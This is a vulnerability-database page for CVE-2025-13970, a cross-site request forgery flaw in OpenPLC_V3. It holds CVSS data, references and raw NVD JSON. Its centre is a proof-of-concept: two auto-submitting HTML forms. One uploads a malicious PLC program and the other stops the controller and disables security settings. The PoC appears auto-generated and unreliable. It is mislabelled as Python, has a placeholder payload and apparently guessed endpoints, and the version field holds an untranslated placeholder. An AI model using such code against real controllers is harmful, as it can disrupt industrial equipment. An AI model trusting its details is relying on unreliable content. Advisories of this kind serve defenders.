CVE-2025-13970

Description

OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack due to the absence of proper CSRF validation. This issue allows an unauthenticated attacker to trick a logged-in administrator into visiting a maliciously crafted link, potentially enabling unauthorized modification of PLC settings or the upload of malicious programs which could lead to significant disruption or damage to connected systems.

CVSS Details

CVSS Score

8.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenPLC_V3 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-13970: OpenPLC_V3 PLC Program Upload -->
<!-- This PoC demonstrates uploading a malicious PLC program -->
<html>
  <body>
    <h1>CVE-2025-13970 CSRF Attack PoC</h1>
    <p>Target: OpenPLC_V3 Web Interface</p>
    <p>Action: Upload malicious PLC program</p>
    <form id="csrfForm" action="http://target:8080/upload_program" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="program_name" value="malicious_program.st" />
      <input type="hidden" name="program_content" value="(* Malicious ST code - triggers unauthorized control logic *) VAR x AT %IX0.0 : BOOL; END_VAR IF x THEN (* Execute malicious operations *) END_IF" />
      <input type="hidden" name="action" value="upload" />
      <input type="hidden" name="csrf_token" value="" />
    </form>
    <script>
      // Auto-submit the form when page loads
      document.addEventListener('DOMContentLoaded', function() {
        document.getElementById('csrfForm').submit();
      });
    </script>
    <p>If you see this message, the attack failed.</p>
  </body>
</html>

<!-- Alternative: Configuration Modification CSRF PoC -->
<html>
  <body>
    <form id="configAttack" action="http://target:8080/api/config/update" method="POST">
      <input type="hidden" name="plc_mode" value="stop" />
      <input type="hidden" name="io_mapping" value="modified_mapping" />
      <input type="hidden" name="security_enabled" value="false" />
    </form>
    <script>document.getElementById('configAttack').submit();</script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13970
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13970
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13970/
[4] VulDB https://vuldb.com/cve/CVE-2025-13970
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-345-10.json
[6] https://github.com/thiagoralves/OpenPLC_v3
[7] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13970", "sourceIdentifier": "[email protected]", "published": "2025-12-13T01:15:51.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack \ndue to the absence of proper CSRF validation. This issue allows an \nunauthenticated attacker to trick a logged-in administrator into \nvisiting a maliciously crafted link, potentially enabling unauthorized \nmodification of PLC settings or the upload of malicious programs which \ncould lead to significant disruption or damage to connected systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-345-10.json", "source": "[email protected]"}, {"url": "https://github.com/thiagoralves/OpenPLC_v3", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10", "source": "[email protected]"}]}}